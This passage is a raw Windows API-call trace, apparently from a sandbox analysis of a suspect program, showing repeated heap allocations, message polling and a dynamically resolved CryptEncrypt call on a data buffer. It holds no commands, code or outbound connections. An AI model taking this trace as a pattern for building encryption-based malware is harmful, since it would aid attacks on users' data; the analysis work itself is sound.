0x2e77888 [0226.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0226.738] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x3bf0dd8 [0226.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550b8 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0226.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x2f197b8 [0226.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0226.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0226.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0226.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0226.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.742] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0226.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0226.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.742] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0226.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.743] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0226.743] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0226.743] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0226.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0226.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.743] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.743] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0226.743] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0226.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0226.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.744] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0226.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0226.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.745] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0226.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.745] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4f91, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4f98) returned 1 [0226.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0226.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0226.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0226.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0226.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0226.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0226.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0226.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0226.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0226.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0226.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0226.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0226.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0226.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0226.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0226.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.751] RtlAllocateHeap 